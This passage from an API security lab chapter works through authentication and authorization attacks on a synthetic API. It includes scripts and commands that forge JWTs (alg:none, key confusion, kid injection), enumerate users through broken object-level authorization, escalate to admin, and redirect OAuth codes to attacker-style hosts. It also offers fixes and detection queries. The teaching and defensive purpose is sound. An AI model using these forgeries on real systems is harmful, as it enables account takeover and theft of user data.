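The logic behind both queries can be prototyped offline against exported logs before tuning thresholds in the SIEM. The sketch below mirrors the five-minute bucketing and the distinct-path threshold; the event tuple layout `(epoch_seconds, client_ip, url)` and the sample traffic are assumptions for illustration.

```python
from collections import defaultdict

RECON_MARKERS = ("/docs", "/redoc", "/swagger", "/openapi.json",
                 "/debug/", "/internal/", "/graphiql", "/v1/")
WINDOW = 300  # bucket size in seconds (5 minutes)


def detect_recon(events, threshold=5):
    """Return {(ip, bucket_start): sorted urls} where distinct recon URLs exceed threshold."""
    buckets = defaultdict(set)
    for ts, ip, url in events:
        if any(marker in url for marker in RECON_MARKERS):
            buckets[(ip, ts - ts % WINDOW)].add(url)
    return {key: sorted(urls) for key, urls in buckets.items() if len(urls) > threshold}


start = 1711936800  # aligned to a 5-minute boundary
probes = ["/docs", "/redoc", "/openapi.json", "/v2/debug/config",
          "/v2/internal/metrics", "/graphiql"]
events = [(start + i * 10, "203.0.113.77", path) for i, path in enumerate(probes)]
events.append((start + 5, "198.51.100.20", "/docs"))        # single doc hit: benign
events.append((start + 6, "198.51.100.20", "/v2/projects")) # not a recon path

alerts = detect_recon(events)
for (ip, bucket), urls in alerts.items():
    print(ip, bucket, len(urls))
```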

Defensive Recommendations

Hardening API Documentation and Debug Endpoints

  1. Disable debug endpoints in production — use environment-based configuration to ensure /debug/* routes are never registered in production builds
  2. Restrict documentation access — require authentication for /docs, /redoc, and /openapi.json in production; consider IP-allowlisting
  3. Remove server identification headers — strip server, x-powered-by, and framework-specific headers
  4. Deprecate and decommission v1 API — if v1 must remain for backward compatibility, enforce the same authentication standards as v2
  5. Implement API inventory management — maintain a living catalog of all API endpoints with their security posture; use automated scanning to detect drift
  6. Sanitize error responses — never expose stack traces, SQL queries, or internal paths in API responses; use generic error codes with correlation IDs for debugging
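
As one way to approach the last recommendation, the sketch below logs full exception detail server-side and returns only a generic code plus a correlation ID to the client. The error code strings and the `sanitize_error` helper are hypothetical; wiring it into a framework's exception handler is left out.

```python
import logging
import uuid

log = logging.getLogger("api.errors")


def sanitize_error(exc, status=500):
    """Log full detail internally; return only a generic, correlatable body."""
    correlation_id = str(uuid.uuid4())
    # The exception message and traceback go to the server log only
    log.error("correlation_id=%s unhandled error", correlation_id, exc_info=exc)
    return {
        "error_code": "INTERNAL_ERROR" if status >= 500 else "BAD_REQUEST",
        "correlation_id": correlation_id,
    }


body = sanitize_error(RuntimeError("SELECT * FROM users WHERE id = '1 OR 1=1'"))
print(sorted(body))
```

Support staff can then look up the correlation ID in the logs, so nothing about the query or file layout needs to reach the client.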

Cross-Reference

For more on API inventory and application security fundamentals, see Chapter 30: Application Security and Chapter 29: Vulnerability Management.


Exercise 2: Authentication & Authorization Attacks

Objectives

  • Analyze and manipulate JWT tokens to escalate privileges
  • Exploit broken object-level authorization (BOLA) to access other users' resources
  • Abuse OAuth2 authorization code flow weaknesses
  • Test broken function-level authorization to access admin endpoints
  • Forge legacy API tokens to bypass authentication entirely

OWASP API Mapping

Finding Category | OWASP API 2023
JWT manipulation | API2:2023 — Broken Authentication
BOLA exploitation | API1:2023 — Broken Object Level Authorization
OAuth2 flow abuse | API2:2023 — Broken Authentication
Admin endpoint access | API5:2023 — Broken Function Level Authorization

Step 2.1: JWT Token Analysis

Decode and Inspect JWT Structure

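# Decode the JWT header (segments are unpadded base64url, so map the URL-safe
# alphabet back first; 2>/dev/null hides the missing-padding warning)
echo "$TOKEN" | cut -d'.' -f1 | tr '_-' '/+' | base64 -d 2>/dev/null | jq .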

Expected Output (Synthetic):

{
  "alg": "RS256",
  "typ": "JWT",
  "kid": "test-key-1"
}
# Decode the JWT payload (same base64url handling as the header)
echo "$TOKEN" | cut -d'.' -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | jq .

Expected Output (Synthetic):

{
  "sub": "user-1001",
  "tenant": "tenant-001",
  "role": "user",
  "scopes": ["read", "write"],
  "iat": 1711936000,
  "exp": 1711939600,
  "iss": "auth.example.com"
}
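
Shell decoding is fragile because JWT segments use the URL-safe alphabet and omit padding. A Python sketch that restores the padding explicitly is shown below. The header segment is copied from the lab token, while the payload and signature are placeholders built for this example; no signature verification is performed.

```python
import base64
import json


def b64url_decode(segment):
    """Decode an unpadded base64url segment (the JWT encoding)."""
    padded = segment + "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(padded)


def decode_jwt_unverified(token):
    """Return (header, payload) as dicts. The signature is NOT checked."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


# Header segment from the lab token; payload and signature are placeholders
header_segment = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ"
payload_segment = base64.urlsafe_b64encode(
    b'{"sub":"user-1001","role":"user"}'
).rstrip(b"=").decode()

header, payload = decode_jwt_unverified(f"{header_segment}.{payload_segment}.sig")
print(header["alg"], header["kid"], payload["role"])
```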

Test JWT Algorithm Confusion (None Algorithm)

# Use jwt_tool's alg:none exploit mode (-X a)
python3 jwt_tool.py "$TOKEN" -X a

# Manual none algorithm attack
# Create header with alg: none (tr also strips the line wraps GNU base64 adds)
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=\n' | tr '/+' '_-'
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0

# Create payload with admin role
echo -n '{"sub":"user-1001","tenant":"tenant-001","role":"admin","scopes":["read","write","admin","billing"],"iat":1711936000,"exp":1999999999,"iss":"auth.example.com"}' | base64 | tr -d '=\n' | tr '/+' '_-'

# Construct the forged token (header.payload. with empty signature)
FORGED_NONE="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJ1c2VyLTEwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6ImFkbWluIiwic2NvcGVzIjpbInJlYWQiLCJ3cml0ZSIsImFkbWluIiwiYmlsbGluZyJdLCJpYXQiOjE3MTE5MzYwMDAsImV4cCI6MTk5OTk5OTk5OSwiaXNzIjoiYXV0aC5leGFtcGxlLmNvbSJ9."

# Test the forged token
curl -s https://api.example.com/v2/admin/users \
  -H "Authorization: Bearer $FORGED_NONE" | jq .

Expected Output (Synthetic):

{
  "users": [
    {"id": "user-1001", "username": "testuser", "role": "user", "tenant": "tenant-001"},
    {"id": "user-1002", "username": "jane.smith", "role": "user", "tenant": "tenant-001"},
    {"id": "user-9001", "username": "admin", "role": "admin", "tenant": "tenant-001"}
  ],
  "total": 3,
  "page": 1,
  "per_page": 20
}

Critical Finding: Algorithm None Attack Successful

The API accepts JWT tokens with "alg": "none", allowing complete authentication bypass. An attacker can forge tokens with arbitrary claims (including admin role) without knowing the signing key. This is a critical API2:2023 — Broken Authentication vulnerability.
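
The root cause is that the server lets the token header choose how it is verified. As a hedged illustration of the fix, the sketch below rejects any token whose `alg` is not on a server-side allowlist before signature verification is attempted. `ALLOWED_ALGS`, `RejectedToken`, and `require_expected_alg` are hypothetical names, and the assumption that NovaPlatform should accept only RS256 comes from the decoded header shown in Step 2.1.

```python
import base64
import json

# Assumption: the platform issues RS256 tokens only (see the decoded header in Step 2.1)
ALLOWED_ALGS = frozenset({"RS256"})


class RejectedToken(Exception):
    """Raised when a token fails the pre-verification checks."""


def require_expected_alg(token: str) -> str:
    """Return the header's alg if it is allowlisted, otherwise raise RejectedToken."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        # alg:none forgeries typically end with an empty signature segment
        raise RejectedToken("token must have three non-empty segments")
    header_b64 = parts[0]
    try:
        padded = header_b64 + "=" * (-len(header_b64) % 4)
        header = json.loads(base64.urlsafe_b64decode(padded))
    except ValueError as exc:
        raise RejectedToken("unreadable header") from exc
    alg = header.get("alg") if isinstance(header, dict) else None
    if alg not in ALLOWED_ALGS:
        raise RejectedToken(f"unexpected alg: {alg!r}")
    return alg
```

This check only gates which tokens reach signature verification; the signature itself must still be verified with the pinned algorithm and key.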

Test JWT Key Confusion (RS256 to HS256)

# Fetch the public key
curl -s https://auth.example.com/.well-known/jwks.json | jq .

Expected Output (Synthetic):

{
  "keys": [
    {
      "kty": "RSA",
      "kid": "test-key-1",
      "use": "sig",
      "alg": "RS256",
      "n": "SYNTHETIC_RSA_MODULUS_DATA",
      "e": "AQAB"
    }
  ]
}

# Convert JWKS to PEM format
python3 -c "
from jwcrypto import jwk
import json

# Synthetic JWKS data
jwks_data = '{\"keys\":[{\"kty\":\"RSA\",\"kid\":\"test-key-1\",\"use\":\"sig\",\"alg\":\"RS256\",\"n\":\"SYNTHETIC_RSA_MODULUS_DATA\",\"e\":\"AQAB\"}]}'
jwks = json.loads(jwks_data)
key = jwk.JWK(**jwks['keys'][0])
# export_to_pem() returns bytes; decode so the file holds PEM text rather than a b'...' repr
print(key.export_to_pem().decode(), end='')
" > public_key.pem

# Use jwt_tool for key confusion attack (RS256 → HS256)
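python3 jwt_tool.py "$TOKEN" -X k -pk public_key.pem

# Key confusion attack script (SYNTHETIC - educational only)
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Encode bytes as unpadded base64url, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# Read the public key as bytes; the HMAC secret must match the server's copy byte for byte
with open('public_key.pem', 'rb') as f:
    public_key = f.read()

# Create admin payload
payload = {
    "sub": "user-1001",
    "tenant": "tenant-001",
    "role": "admin",
    "scopes": ["read", "write", "admin", "billing"],
    "iat": 1711936000,
    "exp": 1999999999,
    "iss": "auth.example.com"
}

header = {"alg": "HS256", "typ": "JWT", "kid": "test-key-1"}

# Sign with HS256 using the RSA public key as the HMAC secret
# This works when the server uses the same key variable for both algorithms
# The signature is computed with hmac directly because current PyJWT releases
# refuse to use a PEM-encoded key as an HMAC secret (InvalidKeyError)
signing_input = ".".join(
    b64url(json.dumps(part, separators=(",", ":")).encode())
    for part in (header, payload)
)
signature = hmac.new(public_key, signing_input.encode(), hashlib.sha256).digest()
forged_token = f"{signing_input}.{b64url(signature)}"

print(f"Forged token: {forged_token}")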

Algorithm Confusion Explained

In RS256, the server uses a private key to sign and a public key to verify. In HS256, the same secret is used for both operations. If the server doesn't enforce the expected algorithm and uses the same key variable regardless of algorithm, an attacker can:

  1. Obtain the RSA public key (which is meant to be public)
  2. Change the JWT header algorithm from RS256 to HS256
  3. Sign the token with the public key using HMAC
  4. The server verifies using the same public key as the HMAC secret, and it succeeds
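
The steps above can be reproduced offline with the standard library alone. This is a simplified sketch, not the NovaPlatform verifier: `naive_verify` models the vulnerable pattern (the header picks the algorithm and one key variable serves both), `pinned_verify` models the fix, and the PEM content is a synthetic placeholder. RS256 verification itself is deliberately left out.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a compact JWT signed with HMAC-SHA256."""
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(mac)}"


def naive_verify(token: str, verification_key: bytes) -> bool:
    """Vulnerable pattern: the token's own header selects the algorithm."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64))["alg"]
    if alg == "HS256":
        expected = hmac.new(
            verification_key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
        ).digest()
        return hmac.compare_digest(expected, b64url_decode(sig_b64))
    return False  # RS256 verification is omitted from this sketch


def pinned_verify(token: str, verification_key: bytes, expected_alg: str = "RS256") -> bool:
    """Safer pattern: refuse any token whose alg differs from the pinned one."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    if header.get("alg") != expected_alg:
        return False  # the HS256 forgery stops here
    raise NotImplementedError("RS256 signature verification is out of scope for this sketch")


# Synthetic stand-in for the server's public key file
public_key_pem = b"-----BEGIN PUBLIC KEY-----\nSYNTHETIC\n-----END PUBLIC KEY-----\n"
forged = sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"sub": "user-1001", "role": "admin"},
    public_key_pem,
)

print("naive verifier accepts forgery: ", naive_verify(forged, public_key_pem))
print("pinned verifier accepts forgery:", pinned_verify(forged, public_key_pem))
```

The forgery depends only on public information, which is why pinning the algorithm on the server is the decisive control.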

Test JWT Kid (Key ID) Injection

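# Test kid parameter injection via directory traversal
# -I injects the claims; -S hs256 -p "" re-signs with the empty key that /dev/null yields
python3 jwt_tool.py "$TOKEN" -I -hc kid -hv "../../../../../../dev/null" -pc role -pv admin -S hs256 -p ""

# Test kid parameter injection via SQL injection
# The injected UNION makes the key lookup return 'SYNTHETIC-KEY', so sign with that value
python3 jwt_tool.py "$TOKEN" -I -hc kid -hv "test-key-1' UNION SELECT 'SYNTHETIC-KEY' -- " -pc role -pv admin -S hs256 -p "SYNTHETIC-KEY"

# KID injection via directory traversal (SYNTHETIC - educational only)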
import jwt

payload = {
    "sub": "user-1001",
    "tenant": "tenant-001",
    "role": "admin",
    "scopes": ["read", "write", "admin", "billing"],
    "iat": 1711936000,
    "exp": 1999999999,
    "iss": "auth.example.com"
}

# If kid is used to read a file for the signing key,
# pointing it to /dev/null (empty file) means the key is an empty string
forged_token = jwt.encode(
    payload,
    "",  # empty string as key
    algorithm="HS256",
    headers={
        "kid": "../../../../../../dev/null",
        "typ": "JWT"
    }
)

print(f"Forged token (kid traversal): {forged_token}")
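
Both kid attacks work only if the server passes the header value into a file path or a SQL string. A hedged sketch of the defensive alternative follows: treat `kid` as an opaque identifier, validate its shape, and look it up in a fixed keyring. `KEYRING`, `KID_PATTERN`, and `resolve_key` are hypothetical names, and the key material is a placeholder.

```python
import re

# Hypothetical in-memory keyring; a real service would load this from its key store
KEYRING = {
    "test-key-1": "-----BEGIN PUBLIC KEY-----\nSYNTHETIC\n-----END PUBLIC KEY-----\n",
}

# Assumption: legitimate key IDs are short and use only these characters
KID_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_key(kid: object) -> str:
    """Return the key registered for kid, or raise KeyError."""
    if not isinstance(kid, str) or not KID_PATTERN.fullmatch(kid):
        raise KeyError("malformed kid")
    # Plain dictionary lookup: kid never reaches a file path or a SQL statement
    return KEYRING[kid]
```

With this lookup, `../../../../../../dev/null` and the UNION payload are both rejected as malformed before any key is selected.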

Step 2.2: Broken Object Level Authorization (BOLA)

Test IDOR on User Profiles

# Access own profile (authorized)
curl -s https://api.example.com/v2/users/user-1001/profile \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "tenant": "tenant-001",
  "role": "user",
  "phone": "+1-555-0100",
  "address": "123 Test Street, Example City",
  "created_at": "2025-01-15T10:00:00Z",
  "last_login": "2026-04-01T08:05:00Z",
  "subscription_tier": "basic",
  "api_keys": [
    {
      "id": "key-001",
      "prefix": "nova_k1_****",
      "created_at": "2025-06-01T00:00:00Z",
      "last_used": "2026-03-31T12:00:00Z"
    }
  ]
}

# Attempt to access another user's profile (BOLA test)
curl -s https://api.example.com/v2/users/user-1002/profile \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "id": "user-1002",
  "username": "jane.smith",
  "email": "jane.smith@example.com",
  "full_name": "Jane Smith",
  "tenant": "tenant-001",
  "role": "user",
  "phone": "+1-555-0101",
  "address": "456 Another Road, Example Town",
  "created_at": "2025-02-20T14:00:00Z",
  "last_login": "2026-03-30T16:20:00Z",
  "subscription_tier": "premium",
  "api_keys": [
    {
      "id": "key-042",
      "prefix": "nova_k1_****",
      "created_at": "2025-07-15T00:00:00Z",
      "last_used": "2026-03-28T09:15:00Z"
    }
  ]
}

Critical Finding: Broken Object Level Authorization

The API returns full profile data for any user when given a valid user ID, regardless of whether the authenticated user should have access. The testuser account can view jane.smith's private profile including email, phone, address, and API key metadata. This is API1:2023 — Broken Object Level Authorization.
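
For contrast, this is roughly what the missing check looks like. It is a sketch under an assumed policy (owners may read their own profile, and admins may read profiles inside their own tenant); the real NovaPlatform policy is not specified in the lab, and `Caller` and `can_read_profile` are hypothetical names.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Caller:
    """Identity taken from a verified token, never from the request path."""
    user_id: str
    tenant: str
    role: str


def can_read_profile(caller: Caller, target_user_id: str, target_tenant: str) -> bool:
    """Assumed policy: owners, plus admins within the same tenant."""
    if caller.user_id == target_user_id:
        return True
    return caller.role == "admin" and caller.tenant == target_tenant


testuser = Caller(user_id="user-1001", tenant="tenant-001", role="user")
print(can_read_profile(testuser, "user-1001", "tenant-001"))  # own profile
print(can_read_profile(testuser, "user-1002", "tenant-001"))  # jane.smith's profile
```

The key design point is that the decision compares the authenticated identity against the specific object requested, on every request.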

Enumerate User IDs via BOLA

# BOLA enumeration script (SYNTHETIC - educational only)
import requests
import json

base_url = "https://api.example.com/v2"
headers = {
    "Authorization": "Bearer SYNTHETIC_TOKEN_HERE",
    "Content-Type": "application/json"
}

# Predictable user ID pattern: user-XXXX
discovered_users = []

for i in range(1001, 1020):
    user_id = f"user-{i}"
    response = requests.get(
        f"{base_url}/users/{user_id}/profile",
        headers=headers,
        timeout=10,  # Avoid hanging on an unresponsive endpoint
        verify=True  # Always verify TLS in real tests
    )

    if response.status_code == 200:
        user_data = response.json()
        discovered_users.append({
            "id": user_data["id"],
            "username": user_data["username"],
            "email": user_data["email"],
            "role": user_data["role"],
            "tenant": user_data["tenant"]
        })
        print(f"[+] Found: {user_id} - {user_data['username']} ({user_data['role']})")
    elif response.status_code == 404:
        print(f"[-] Not found: {user_id}")
    else:
        print(f"[?] Unexpected {response.status_code}: {user_id}")

print(f"\n[*] Total users discovered: {len(discovered_users)}")
print(json.dumps(discovered_users, indent=2))

Expected Output (Synthetic):

[+] Found: user-1001 - testuser (user)
[+] Found: user-1002 - jane.smith (user)
[+] Found: user-1003 - bob.wilson (user)
[-] Not found: user-1004
[+] Found: user-1005 - alice.chen (user)
[+] Found: user-1006 - carlos.reyes (user)
[-] Not found: user-1007
...
[+] Found: user-1015 - sarah.kumar (user)

[*] Total users discovered: 11

Cross-Tenant BOLA

# Test cross-tenant access — use tenant-001 token to access tenant-002 project
curl -s https://api.example.com/v2/projects/proj-2001 \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "id": "proj-2001",
  "name": "Classified Research Project",
  "description": "Confidential R&D initiative for Q3 launch",
  "tenant": "tenant-002",
  "owner": "user-2001",
  "created_at": "2026-01-10T09:00:00Z",
  "files_count": 47,
  "collaborators": [
    {"user_id": "user-2001", "role": "owner"},
    {"user_id": "user-2002", "role": "editor"}
  ],
  "settings": {
    "visibility": "private",
    "allow_external_sharing": false
  }
}

Critical Finding: Cross-Tenant Data Access

A user from tenant-001 can access projects belonging to tenant-002 simply by changing the project ID in the URL. The API does not validate tenant boundaries. This is a critical API1:2023 — Broken Object Level Authorization vulnerability that compromises multi-tenant isolation.
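
One way to enforce the tenant boundary is to make the tenant part of every lookup, so that a foreign project ID simply returns nothing. The sketch below uses an in-memory SQLite database purely for illustration; the table layout and the `get_project` helper are assumptions, not the NovaPlatform schema.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE projects (id TEXT PRIMARY KEY, tenant TEXT NOT NULL, name TEXT NOT NULL)"
)
conn.executemany(
    "INSERT INTO projects VALUES (?, ?, ?)",
    [
        ("proj-1001", "tenant-001", "Q1 Project Report"),
        ("proj-2001", "tenant-002", "Classified Research Project"),
    ],
)


def get_project(conn: sqlite3.Connection, project_id: str, caller_tenant: str):
    """Fetch a project only if it belongs to the caller's tenant."""
    return conn.execute(
        "SELECT id, tenant, name FROM projects WHERE id = ? AND tenant = ?",
        (project_id, caller_tenant),  # tenant comes from the verified token
    ).fetchone()


print(get_project(conn, "proj-1001", "tenant-001"))
print(get_project(conn, "proj-2001", "tenant-001"))  # cross-tenant request
```

Returning "not found" for a foreign ID, rather than "forbidden", also avoids confirming that the ID exists in another tenant.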

Step 2.3: Broken Function Level Authorization

# Test admin endpoints with standard user token

# 1. Admin user listing
curl -s https://api.example.com/v2/admin/users \
  -H "Authorization: Bearer $TOKEN" | jq '.users | length'
# Expected: Returns user list even though testuser is not admin

# 2. Admin configuration
curl -s https://api.example.com/v2/admin/config \
  -H "Authorization: Bearer $TOKEN" | jq .

# 3. Admin audit log
curl -s https://api.example.com/v2/admin/audit-log \
  -H "Authorization: Bearer $TOKEN" | jq '.entries[:3]'

# 4. User impersonation (admin-only function)
curl -s -X POST https://api.example.com/v2/admin/impersonate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"target_user_id": "user-9001"}' | jq .

Expected Output for Impersonation (Synthetic):

{
  "impersonation_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.SYNTHETIC_IMPERSONATION_TOKEN",
  "target_user": {
    "id": "user-9001",
    "username": "admin",
    "role": "admin"
  },
  "expires_in": 1800,
  "warning": "You are now acting as user-9001"
}

Critical Finding: Function Level Authorization Bypass

The /v2/admin/impersonate endpoint, which should be restricted to admin users only, is accessible by standard users. A regular user can impersonate any user including administrators, effectively achieving full privilege escalation. This is API5:2023 — Broken Function Level Authorization.
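
A function-level check can be expressed as a small decorator applied to every admin handler. This is a framework-neutral sketch: `require_role`, `Forbidden`, and the `impersonate` handler are hypothetical, and `caller` is assumed to be the dictionary of claims from an already verified token.

```python
from functools import wraps


class Forbidden(Exception):
    """Raised when the caller's role does not permit the function."""


def require_role(*allowed_roles):
    """Decorator that rejects callers whose verified role is not allowed."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(caller, *args, **kwargs):
            if caller.get("role") not in allowed_roles:
                raise Forbidden(f"{handler.__name__} requires one of {allowed_roles}")
            return handler(caller, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def impersonate(caller, target_user_id):
    # Hypothetical admin-only handler
    return {"acting_as": target_user_id, "requested_by": caller["sub"]}


try:
    impersonate({"sub": "user-1001", "role": "user"}, "user-9001")
except Forbidden as exc:
    print("denied:", exc)
```

Applying the decorator at the handler keeps the rule next to the code it protects, instead of relying on route naming such as `/admin/`.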

Step 2.4: OAuth2 Flow Exploitation

Authorization Code Interception

# Step 1: Initiate OAuth2 flow — note the state parameter handling
curl -s -D - "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://app.example.com/callback&\
scope=read+write+admin&\
state=random-state-value" 2>&1 | head -20

Test Redirect URI Manipulation

# Test open redirect in OAuth2 flow
# 1. Subdomain takeover via redirect_uri
curl -s -o /dev/null -w "%{http_code} %{redirect_url}" \
  "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://evil.app.example.com/callback&\
scope=read+write&\
state=test-state"

# 2. Path traversal in redirect_uri
curl -s -o /dev/null -w "%{http_code} %{redirect_url}" \
  "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://app.example.com/callback/../../../attacker-page&\
scope=read+write&\
state=test-state"

# 3. Fragment-based redirect bypass
curl -s -o /dev/null -w "%{http_code} %{redirect_url}" \
  "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://app.example.com/callback%23@attacker.example.com&\
scope=read+write&\
state=test-state"

Expected Output (Synthetic):

302 https://evil.app.example.com/callback?code=SYNTHETIC-AUTH-CODE&state=test-state
302 https://app.example.com/attacker-page?code=SYNTHETIC-AUTH-CODE&state=test-state
400 (rejected - fragment-based bypass blocked)

Finding: OAuth2 Redirect URI Validation Bypass

The authorization server accepts redirect URIs with subdomain variations and path traversal. An attacker who controls a host such as evil.app.example.com (for example, through a subdomain takeover) could receive and steal authorization codes. The server should enforce exact match on registered redirect URIs. This is API2:2023 — Broken Authentication.
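
Exact matching is simple to implement, which is part of its appeal. The sketch below compares the submitted `redirect_uri` as a plain string against the set registered for the client; the registry contents and the `redirect_uri_allowed` name are assumptions for illustration.

```python
# Hypothetical client registry: client_id -> exact redirect URIs registered for it
REGISTERED_REDIRECT_URIS = {
    "REDACTED-CLIENT-ID": frozenset({"https://app.example.com/callback"}),
}


def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison; no prefix, wildcard, or normalization logic."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, frozenset())


for candidate in (
    "https://app.example.com/callback",
    "https://evil.app.example.com/callback",
    "https://app.example.com/callback/../../../attacker-page",
    "https://app.example.com/callback#@attacker.example.com",
):
    print(redirect_uri_allowed("REDACTED-CLIENT-ID", candidate), candidate)
```

Because nothing is parsed or normalized, the subdomain, traversal, and fragment variants from this step all fail the comparison.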

Scope Escalation

# Request admin scope as regular user — test if authorization server validates
curl -s -X POST https://auth.example.com/oauth2/token \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "grant_type=authorization_code&\
code=SYNTHETIC-AUTH-CODE&\
client_id=REDACTED-CLIENT-ID&\
client_secret=REDACTED-CLIENT-SECRET&\
redirect_uri=https://app.example.com/callback&\
scope=read write admin billing"

Expected Output (Synthetic):

{
  "access_token": "eyJhbGciOiJSUzI1NiJ9.SYNTHETIC_ELEVATED_TOKEN",
  "token_type": "Bearer",
  "expires_in": 3600,
  "scope": "read write admin billing",
  "refresh_token": "REDACTED-REFRESH-TOKEN"
}

Finding: OAuth2 Scope Escalation

The authorization server grants admin and billing scopes to a regular user without validation. The token endpoint should verify that the requested scopes are authorized for the authenticated user's role. This is API2:2023 — Broken Authentication.
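
The expected behavior can be sketched as an intersection between what the client requested and what the user's role may hold. The `ROLE_SCOPES` policy below is hypothetical; only the scope names come from the lab output.

```python
# Hypothetical role-to-scope policy
ROLE_SCOPES = {
    "user": frozenset({"read", "write"}),
    "admin": frozenset({"read", "write", "admin", "billing"}),
}


def grant_scopes(role: str, requested: str) -> str:
    """Return the space-delimited subset of requested scopes the role may hold."""
    allowed = ROLE_SCOPES.get(role, frozenset())
    # dict.fromkeys removes duplicates while keeping the requested order
    granted = [scope for scope in dict.fromkeys(requested.split()) if scope in allowed]
    return " ".join(granted)


print(grant_scopes("user", "read write admin billing"))
```

An authorization server could equally reject the whole request with an `invalid_scope` error; silently narrowing the grant is just one of the two common choices.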

Step 2.5: Forge Legacy v1 API Tokens

# The v1 token format is base64(username:timestamp:role:tenant)
# Forge an admin token
FORGED_V1=$(echo -n "admin:1711936000:admin:tenant-001" | base64)
echo "Forged v1 token: $FORGED_V1"

# Use forged token to access v1 admin endpoints
curl -s https://api.example.com/v1/admin/users \
  -H "Authorization: Basic $FORGED_V1" | jq .

Expected Output (Synthetic):

{
  "users": [
    {"id": "user-1001", "username": "testuser", "email": "testuser@example.com", "role": "user"},
    {"id": "user-1002", "username": "jane.smith", "email": "jane.smith@example.com", "role": "user"},
    {"id": "user-9001", "username": "admin", "email": "admin@novatech.example.com", "role": "admin"}
  ],
  "total": 15
}

Critical Finding: Complete Authentication Bypass via Legacy API

The v1 API uses unsigned base64-encoded tokens. Any user can forge administrative tokens by encoding admin:timestamp:admin:tenant-id. Combined with the lack of API version decommissioning, this provides a trivial path to full administrative access. This combines API2:2023 — Broken Authentication with API9:2023 — Improper Inventory Management.
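
To make the weakness concrete, the sketch below contrasts the unsigned v1 format with a variant that appends an HMAC computed from a server-side secret. The signed format, `SERVER_SECRET`, and both helper functions are illustrative assumptions; they are not how NovaPlatform v2 works, which uses JWTs.

```python
import base64
import hashlib
import hmac

# Assumption: a secret known only to the server (synthetic placeholder)
SERVER_SECRET = b"SYNTHETIC-SERVER-SECRET"


def issue_signed(fields: str, secret: bytes = SERVER_SECRET) -> str:
    """Issue base64(fields:mac), where mac is HMAC-SHA256 over the fields."""
    mac = hmac.new(secret, fields.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(f"{fields}:{mac}".encode()).decode()


def verify_signed(token: str, secret: bytes = SERVER_SECRET):
    """Return the field string if the MAC checks out, otherwise None."""
    try:
        decoded = base64.b64decode(token, validate=True).decode()
    except ValueError:
        return None
    fields, _, mac = decoded.rpartition(":")
    expected = hmac.new(secret, fields.encode(), hashlib.sha256).hexdigest()
    return fields if hmac.compare_digest(mac.encode(), expected.encode()) else None


# The forged v1 token from this step carries no MAC, so verification fails
forged_v1 = base64.b64encode(b"admin:1711936000:admin:tenant-001").decode()
print(verify_signed(forged_v1))
print(verify_signed(issue_signed("testuser:1711936000:user:tenant-001")))
```

Base64 is an encoding, not a protection: without a keyed signature, anyone who knows the field layout can mint a token.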

Detection & Defense — Exercise 2

KQL Detection: JWT Manipulation Attempts

// Detect JWT algorithm confusion and forged token attempts
ApiAccessLog
| where TimeGenerated > ago(1h)
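| extend TokenHeader = extract(@"^(?:Bearer\s+)?([^.]+)\.", 1, AuthorizationHeader)
// JWT segments are base64url without padding; normalize before decoding
| extend TokenHeaderB64 = replace_string(replace_string(TokenHeader, "-", "+"), "_", "/")
| extend TokenHeaderB64 = strcat(TokenHeaderB64, substring("==", 0, (4 - strlen(TokenHeaderB64) % 4) % 4))
| extend DecodedHeader = base64_decode_tostring(TokenHeaderB64)
| extend Algorithm = extract(@'"alg"\s*:\s*"([^"]+)"', 1, DecodedHeader)
| where isnotempty(Algorithm) and Algorithm !~ "RS256"  // Anything other than the expected algorithm, in any letter case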
| project TimeGenerated, ClientIP, URL, Algorithm, StatusCode, UserAgent
| summarize
    AttemptCount = count(),
    Algorithms = make_set(Algorithm),
